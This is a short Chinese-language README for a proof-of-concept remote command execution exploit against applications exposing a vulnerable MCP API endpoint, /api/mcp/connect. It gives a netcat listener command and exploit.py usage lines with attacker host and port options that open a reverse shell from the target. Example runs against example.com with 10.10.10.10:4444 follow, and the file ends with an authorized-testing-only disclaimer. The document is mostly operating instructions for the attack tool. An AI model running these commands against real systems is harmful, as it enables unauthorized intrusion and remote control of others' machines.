本仓库包含一个针对远程命令执行(RCE)漏洞的概念验证(PoC)利用程序,该漏洞影响暴露易受攻击的 MCP API 端点(通常为 /api/mcp/connect)的应用程序。
该漏洞允许通过精心构造的 API 请求执行系统级命令。
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| 参数 | 描述 |
|---|---|
| target | 目标 IP、域名或 URL |
| --lhost | 攻击者 IP |
| --lport | 攻击者端口 |
| 标志 | 描述 |
|---|---|
| -p, --port | 目标端口(默认值:443) |
| -s, --scheme | http 或 https(默认值:https) |
| -e, --endpoint | API 端点路径 |
| -t, --timeout | 请求超时时间 |
| -v, --verbose | 调试输出 |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash 可用。仅限授权测试和教育目的使用。
Parosh B